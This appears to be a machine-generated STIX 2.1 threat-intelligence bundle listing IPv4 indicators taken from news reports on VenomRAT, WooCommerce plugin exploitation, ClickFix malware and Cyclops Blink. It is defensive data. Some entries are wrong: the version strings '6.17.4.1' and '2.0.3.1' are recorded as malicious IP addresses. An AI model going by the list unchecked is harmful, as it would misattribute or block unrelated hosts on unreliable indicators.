{"type":"bundle","id":"bundle--58e07ebb-5241-4a40-8fa4-335ce91295a4","objects":[{"type":"identity","spec_version":"2.1","id":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","created":"2026-09-16T11:14:42.487Z","modified":"2026-09-16T11:14:42.487Z","name":"ZeroHour","identity_class":"system","description":"Indicators auto-extracted from public security reporting. Verify before use."},{"type":"indicator","spec_version":"2.1","id":"indicator--f152fe37-4f2f-43b2-ab40-62b48b5fc67c","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 154.36.188.201","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: ed process handling. The recovered configuration pointed to 154.36.188.201:4449 and identified the implant as Venom RAT + HVNC + Steal","pattern":"[ipv4-addr:value = '154.36.188.201']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d3f47ace-6942-4314-8e36-22d46b383609","created":"2026-09-16T09:36:34.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 155.94.154.195","description":"Seen in \"PAPERMILL Malware Campaign Abuses Signed Notepad++ to Deliver VenomRAT to Windows Users\" (GBHackers). Context: Sender address / DKIM domain dfgfasd@hsaui[.]cc Sending IP 155.94.154.195 Sending MTA (HELO/PTR) mos1.17dlz[.]cn Bulk-mailer auth hos","pattern":"[ipv4-addr:value = '155.94.154.195']","pattern_type":"stix","valid_from":"2026-09-16T09:36:34.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/papermill-malware-campaign/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0895c25c-a17d-41b4-af23-96e74d0a47a2","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 104.194.9.138","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 5c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a succes","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3d0e5265-a559-45d7-8a76-dd51aa941926","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 114.10.43.203","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 0 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack permits an attac","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e02d2bc-0899-48fe-a90d-3a2b272cfb07","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 187.75.114.36","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack pe","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c267c680-3c49-4a03-b072-ad61c6f0b126","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.137.105.214","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 41.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--020e87c1-8880-48a5-a9ae-1cd4aac2a37f","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.180.120.140","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: .129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Be","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--90524238-663e-4df8-9c6d-5f21d1463c39","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 31.59.129.150","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: originated from the following IP addresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.1","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d34835a-3cda-4c4f-bdb2-dd69b928ef3a","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 37.114.144.209","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: 14 23.180.120.140 104.194.9.138 187.75.114.36 114.10.43.203 37.114.144.209 Because a successful attack permits an attacker to upload a","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e9c40b9c-37db-42d4-b72f-b2c405fedc2c","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 6.17.4.1","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: the plugin, has addressed the flaws in version 6.17.3.1 and 6.17.4.1, respectively. Found this article interesting? Follow us on","pattern":"[ipv4-addr:value = '6.17.4.1']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f94aa3cb-17f2-4838-a441-da947fb9f216","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.140","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: dresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.105.214 23.180.120.140 104.194.9.138 187.75.114.36 1","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a6982ef2-ad2c-41c9-9c6b-3e477081166c","created":"2026-09-16T05:48:28.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.213","description":"Seen in \"Attackers Exploit WooCommerce Wholesale Lead Capture Flaw to Plant PHP Web Shells\" (The Hacker News). Context: attempts have originated from the following IP addresses - 92.241.13.213 31.59.129.150 2a0f:85c1:840:5389::1 92.241.13.140 23.137.10","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-16T05:48:28.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/attackers-exploit-woocommerce-wholesale.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e93e3a11-c335-4ec8-8cb0-f3c5697229f8","created":"2026-09-15T14:45:10.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers target WordPress sites via third-party WooCommerce plugin\" (BleepingComputer). Context: aw is tracked as CVE-2026-27540 and impacts plugin versions 2.0.3.1 and older. It is an unauthenticated arbitrary file-upload v","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T14:45:10.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"BleepingComputer","url":"https://www.bleepingcomputer.com/news/security/hackers-target-wordpress-sites-via-third-party-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f8a9b5d7-8b26-4748-936a-872f8402afbb","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentio","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13563ec9-6116-43ca-914d-c8160bb18c85","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: .13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and domains are intentionally defanged (","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7673d6eb-807f-4102-a754-280d4528ac70","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 2.0.3.1","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: bility , tracked as CVE-2026-27540, affects plugin versions 2.0.3.1 and earlier and has received a CVSS severity score of 9.8 o","pattern":"[ipv4-addr:value = '2.0.3.1']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a64a82c4-e38c-4414-8420-47539a55ba22","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP a","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9eaec1c8-5ffb-4ad5-9393-22d4f519f2f9","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.114.36 Note: IP addresses and doma","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc3cfd41-6760-4ac6-a81c-8a0060b54c4b","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: e most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 blocked requests, fo","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a141a676-d92b-4280-96d1-6a196b3a1d28","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: r 1 92.241.13.213 2 31.59.129.150 3 2a0f:85c1:840:5389::1 4 92.241.13.140 5 23.137.105.214 6 23.180.120.140 7 104.194.9.138 8 187.75.","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--25ea9723-67c7-4ae9-88c1-95f237683cf2","created":"2026-09-15T12:05:55.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Actively Exploit Critical WooCommerce Plugin Vulnerability to Upload PHP Backdoors\" (GBHackers). Context: and August 30. The most active sources reportedly included 92.241.13.213 and 31.59.129.150, each responsible for more than 24,000 bl","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T12:05:55.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/woocommerce-plugin-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a190b359-4725-4106-8250-ace360f4a42c","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 104.194.9.138","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,600 blocked exploit requests IP address 104.194.9.138 Observed source of more than 6,100 blocked exploit requests","pattern":"[ipv4-addr:value = '104.194.9.138']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--470b7b12-3add-4d5a-9a68-cf571614b4f2","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 114.10.43.203","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 470 blocked exploit requests IP address 114.10.43.203 Observed source of more than 310 blocked exploit requests I","pattern":"[ipv4-addr:value = '114.10.43.203']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a09a5d51-f1d5-46ef-be07-6f2806404141","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 187.75.114.36","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,100 blocked exploit requests IP address 187.75.114.36 Observed source of more than 470 blocked exploit requests I","pattern":"[ipv4-addr:value = '187.75.114.36']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f41fdf38-388b-4b53-a75f-79afb9ce5b9c","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.137.105.214","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 9,100 blocked exploit requests IP address 23.137.105.214 Observed source of more than 6,700 blocked exploit requests","pattern":"[ipv4-addr:value = '23.137.105.214']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8e9c4c6c-d25d-4c93-9dbb-5126d2d906f8","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 23.180.120.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: urce of more than 6,700 blocked exploit requests IP address 23.180.120.140 Observed source of more than 6,600 blocked exploit requests","pattern":"[ipv4-addr:value = '23.180.120.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2e863404-25e7-4539-b694-5461714de1c0","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 31.59.129.150","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 24,900 blocked exploit requests IP address 31.59.129.150 Observed source of more than 24,000 blocked exploit request","pattern":"[ipv4-addr:value = '31.59.129.150']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--07900892-3070-46cc-8cd3-0781167067b6","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 37.114.144.209","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: source of more than 310 blocked exploit requests IP address 37.114.144.209 Observed source of more than 310 blocked exploit requests F","pattern":"[ipv4-addr:value = '37.114.144.209']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9dc5c9fc-4527-4581-b261-d0d4b5a7dc9a","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.140","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: rce of more than 16,000 blocked exploit requests IP address 92.241.13.140 Observed source of more than 9,100 blocked exploit requests","pattern":"[ipv4-addr:value = '92.241.13.140']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbfe5791-8778-4ee0-9a24-4721fd5df94c","created":"2026-09-15T11:41:56.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 92.241.13.213","description":"Seen in \"Hackers Exploit WooCommerce Plugin Bug to Take Over WordPress Sites Without Login\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 92.241.13.213 Observed source of more than 24,900 blocked exploit request","pattern":"[ipv4-addr:value = '92.241.13.213']","pattern_type":"stix","valid_from":"2026-09-15T11:41:56.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-exploit-woocommerce-plugin/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--668db55b-98de-4108-a1b6-f6aff1de53bf","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 164.90.161.147","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: lemetry and /contact exfiltration September macOS execution 164.90.161.147:80 September macOS Post-execution HTTP contact September ma","pattern":"[ipv4-addr:value = '164.90.161.147']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--196d165e-0ed2-419c-a420-32373fb7d089","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 165.22.199.85","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: rect-to-IP TLS C2 using facebook.com SNI Exact PE execution 165.22.199.85 September macOS Telemetry and /contact exfiltration Septemb","pattern":"[ipv4-addr:value = '165.22.199.85']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0a3d8353-eb74-4f08-bc2f-4e4368764a2e","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 45.94.47.204","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: omains. Indicators of Compromise Address Branch Role Source 45.94.47.204:80 AMOS helper Enrollment, task polling, and acknowledgemen","pattern":"[ipv4-addr:value = '45.94.47.204']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--01da22c9-9312-4703-9324-daa9717edd50","created":"2026-09-15T05:22:02.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 77.91.65.13","description":"Seen in \"HBO Max Reddit Account Hijacked to Spread PasteSwitch ClickFix Malware\" (GBHackers). Context: nd-and-control technique in which Amatera communicated with 77.91.65.13:443 while presenting facebook.com in TLS SNI and HTTP autho","pattern":"[ipv4-addr:value = '77.91.65.13']","pattern_type":"stix","valid_from":"2026-09-15T05:22:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hbo-max-reddit-account-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9734528d-28dc-40fa-85ce-4d39b225a17f","created":"2026-09-14T13:33:25.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 89.34.96.56","description":"Seen in \"Cyclops Blink Evolves Into x86-64 Linux Implant With Packet Sniffing and Internal Network Scanning\" (Cyber Security News). Context: ompromise (IoCs):- Type Indicator Description C2 IP address 89.34.96.56 Hard-coded Cyclops Blink command-and-control server C2 TCP","pattern":"[ipv4-addr:value = '89.34.96.56']","pattern_type":"stix","valid_from":"2026-09-14T13:33:25.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/cyclops-blink-evolves/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71206c12-9e7f-4b32-941c-fb863d8f4238","created":"2026-09-14T13:01:36.000Z","modified":"2026-09-16T11:14:42.487Z","created_by_ref":"identity--f31960f8-6aeb-4b1b-8f6d-969f2f61e88d","name":"ipv4: 8.218.50.207","description":"Seen in \"One Click on a Malicious Link Lets Hackers Backdoor Sogou Input Method Users\" (Cyber Security News). Context: n Domain noht1ng.top Exploit-page hosting domain IP address 8.218.50.207 Staging server hosted on Alibaba Cloud in Hong Kong Domain","pattern":"[ipv4-addr:value = 